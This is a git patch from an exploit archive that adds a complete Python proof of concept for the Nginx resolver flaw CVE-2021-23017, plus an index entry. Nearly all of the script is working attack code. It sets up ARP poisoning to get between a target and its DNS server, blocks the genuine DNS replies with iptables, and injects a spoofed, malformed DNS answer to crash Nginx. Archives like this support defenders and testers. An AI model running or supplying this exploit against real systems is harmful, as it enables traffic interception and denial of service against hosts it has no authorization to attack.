From d84f857e94f91c71fcb93041483f661d29023c1e Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 12 Jul 2022 05:01:53 +0000 Subject: [PATCH] DB: 2022-07-12 1 changes to exploits/shellcodes Nginx 1.20.0 - Denial of Service (DOS) --- exploits/multiple/remote/50973.py | 114 ++++++++++++++++++++++++++++++ files_exploits.csv | 1 + 2 files changed, 115 insertions(+) create mode 100755 exploits/multiple/remote/50973.py diff --git a/exploits/multiple/remote/50973.py b/exploits/multiple/remote/50973.py new file mode 100755 index 000000000..bbdfd01ed --- /dev/null +++ b/exploits/multiple/remote/50973.py @@ -0,0 +1,114 @@ +# Exploit Title: Nginx 1.20.0 - Denial of Service (DOS) +# Date: 2022-6-29 +# Exploit Author: Mohammed Alshehri - https://Github.com/M507 +# Vendor Homepage: https://nginx.org/ +# Software Link: https://github.com/nginx/nginx/releases/tag/release-1.20.0 +# Version: 0.6.18 - 1.20.0 +# Tested on: Ubuntu 18.04.4 LTS bionic +# CVE: CVE-2021-23017 +# The bug was discovered by X41 D-SEC GmbH, Luis Merino, Markus Vervier, Eric Sesterhenn +# python3 poc.py --target 172.1.16.100 --dns_server 172.1.16.1 +# The service needs to be configured to use Nginx resolver + +from scapy.all import * +from multiprocessing import Process +from binascii import hexlify, unhexlify +import argparse, time, os + +def device_setup(): + os.system("echo '1' >> /proc/sys/net/ipv4/ip_forward") + os.system("iptables -A FORWARD -p UDP --dport 53 -j DROP") + +def ARPP(target, dns_server): + print("[*] Sending poisoned ARP packets") + target_mac = getmacbyip(target) + dns_server_mac = getmacbyip(dns_server) + while True: + time.sleep(2) + send(ARP(op=2, pdst=target, psrc=dns_server, hwdst=target_mac),verbose = 0) + send(ARP(op=2, pdst=dns_server, psrc=target, hwdst=dns_server_mac),verbose = 0) + +def exploit(target): + print("[*] Listening ") + sniff (filter="udp and port 53 and host " + target, prn = process_received_packet) + +""" +RFC schema + 0 1 2 3 + 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| LENGTH | ID | ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +|Q| OPCODE|A|T|R|R|Z|A|C| RCODE | QDCOUNT | ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| ANCOUNT | NSCOUNT | ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| ARCOUNT | QD | ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| AN | NS | ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| AR | ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + +Fig. DNS + +""" +def process_received_packet(received_packet): + if received_packet[IP].src == target_ip: + if received_packet.haslayer(DNS): + if DNSQR in received_packet: + print("[*] the received packet: " + str(bytes_hex(received_packet))) + print("[*] the received DNS request: " + str(bytes_hex(received_packet[DNS].build()))) + try: + # \/ the received DNS request + dns_request = received_packet[DNS].build() + null_pointer_index = bytes(received_packet[DNS].build()).find(0x00,12) + print("[*] debug: dns_request[:null_pointer_index] : "+str(hexlify(dns_request[:null_pointer_index]))) + print("[*] debug: dns_request[null_pointer_index:] : "+str(hexlify(dns_request[null_pointer_index:]))) + payload = [ + dns_request[0:2], + b"\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00", + dns_request[12:null_pointer_index+1], + dns_request[null_pointer_index+1:null_pointer_index+3], + dns_request[null_pointer_index+3:null_pointer_index+5], + b"\xC0\x0C\x00\x05\x00\x01\x00\x00\x0E\x10", + b"\x00\x0B\x18\x41\x41\x41\x41\x41\x41\x41", + b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41", + b"\x41\x41\x41\x41\x41\x41\x41\xC0\x04" + ] + + payload = b"".join(payload) + spoofed_pkt = (Ether()/IP(dst=received_packet[IP].src, src=received_packet[IP].dst)/\ + UDP(dport=received_packet[UDP].sport, sport=received_packet[UDP].dport)/\ + payload) + print("[+] dns answer: "+str(hexlify(payload))) + print("[+] full packet: " + str(bytes_hex(spoofed_pkt))) + + sendp(spoofed_pkt, count=1) + print("\n[+] malicious answer was sent") + print("[+] exploited\n") + except: + print("\n[-] ERROR") + +def main(): + global target_ip + parser = argparse.ArgumentParser() + parser.add_argument("-t", "--target", help="IP address of the target") + parser.add_argument("-r", "--dns_server", help="IP address of the DNS server used by the target") + args = parser.parse_args() + target_ip = args.target + dns_server_ip = args.dns_server + device_setup() + processes_list = [] + ARPPProcess = Process(target=ARPP,args=(target_ip,dns_server_ip)) + exploitProcess = Process(target=exploit,args=(target_ip,)) + processes_list.append(ARPPProcess) + processes_list.append(exploitProcess) + for process in processes_list: + process.start() + for process in processes_list: + process.join() + +if __name__ == '__main__': + target_ip = "" + main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 86de269c2..d3325a88f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -18711,6 +18711,7 @@ id,file,description,date,author,type,platform,port 50962,exploits/hardware/remote/50962.py,"TP-Link Router AX50 firmware 210730 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Tomas Melicher",remote,hardware, 50964,exploits/multiple/remote/50964.py,"Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE)",1970-01-01,Altelus,remote,multiple, 50972,exploits/windows/remote/50972.py,"WiFi Mouse 1.7.8.5 - Remote Code Execution(v2)",1970-01-01,RedHatAugust,remote,windows, +50973,exploits/multiple/remote/50973.py,"Nginx 1.20.0 - Denial of Service (DOS)",1970-01-01,"Mohammed Alshehri",remote,multiple, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,